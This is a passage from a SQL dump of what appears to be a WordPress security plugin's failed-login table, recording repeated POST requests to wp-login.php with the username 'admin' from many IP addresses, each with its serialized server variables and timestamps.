/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746942746.5603571;s:12:\"REQUEST_TIME\";i:1746942746;}}','186.209.113.104',0,'2025-05-11 11:22:28','1970-01-01 00:00:00'),(95446,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ru-RU,ru;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"98\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"48158\";s:11:\"REMOTE_ADDR\";s:12:\"68.65.122.96\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746943112.260453;s:12:\"REQUEST_TIME\";i:1746943112;}}','68.65.122.96',0,'2025-05-11 11:28:34','1970-01-01 00:00:00'),(95447,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"pt-BR,pt;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, br, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"98\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.126 Safari/537.36 Edg/113.0.1774.50\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"37796\";s:11:\"REMOTE_ADDR\";s:12:\"66.29.132.42\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746943482.7344711;s:12:\"REQUEST_TIME\";i:1746943482;}}','66.29.132.42',0,'2025-05-11 11:34:44','1970-01-01 00:00:00'),(95448,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"cs-CZ,cs;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"gzip, br\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"99\";s:15:\"HTTP_USER_AGENT\";s:125:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"46988\";s:11:\"REMOTE_ADDR\";s:14:\"103.180.120.26\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"99\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746943849.7713699;s:12:\"REQUEST_TIME\";i:1746943849;}}','103.180.120.26',0,'2025-05-11 11:40:51','1970-01-01 00:00:00'),(95449,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ar-SA,ar;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, br, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"98\";s:15:\"HTTP_USER_AGENT\";s:128:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51896\";s:11:\"REMOTE_ADDR\";s:13:\"142.44.138.99\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746944217.7993851;s:12:\"REQUEST_TIME\";i:1746944217;}}','142.44.138.99',0,'2025-05-11 11:46:59','1970-01-01 00:00:00'),(95450,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ar-SA,ar;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"53760\";s:11:\"REMOTE_ADDR\";s:11:\"89.45.83.89\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746944584.9804339;s:12:\"REQUEST_TIME\";i:1746944584;}}','89.45.83.89',0,'2025-05-11 11:53:06','1970-01-01 00:00:00'),(95451,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"vi-VN,vi;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:10:\"gzip, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"33922\";s:11:\"REMOTE_ADDR\";s:13:\"167.86.124.24\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746944949.2872031;s:12:\"REQUEST_TIME\";i:1746944949;}}','167.86.124.24',0,'2025-05-11 11:59:10','1970-01-01 00:00:00'),(95452,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"uk-UA,uk;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"98\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"53306\";s:11:\"REMOTE_ADDR\";s:13:\"68.65.120.203\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746945317.234874;s:12:\"REQUEST_TIME\";i:1746945317;}}','68.65.120.203',0,'2025-05-11 12:05:19','1970-01-01 00:00:00'),(95453,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ja-JP,ja;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"99\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51448\";s:11:\"REMOTE_ADDR\";s:11:\"66.29.153.8\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"99\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746945681.3520019;s:12:\"REQUEST_TIME\";i:1746945681;}}','66.29.153.8',0,'2025-05-11 12:11:23','1970-01-01 00:00:00'),(95454,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ja-JP,ja;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"46154\";s:11:\"REMOTE_ADDR\";s:14:\"188.245.76.244\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746946050.9138031;s:12:\"REQUEST_TIME\";i:1746946050;}}','188.245.76.244',0,'2025-05-11 12:17:32','1970-01-01 00:00:00'),(95455,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"es-ES,es;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"98\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"42338\";s:11:\"REMOTE_ADDR\";s:12:\"68.65.123.38\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746946424.434659;s:12:\"REQUEST_TIME\";i:1746946424;}}','68.65.123.38',0,'2025-05-11 12:23:46','1970-01-01 00:00:00'),(95456,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"it-IT,it;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"98\";s:15:\"HTTP_USER_AGENT\";s:125:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 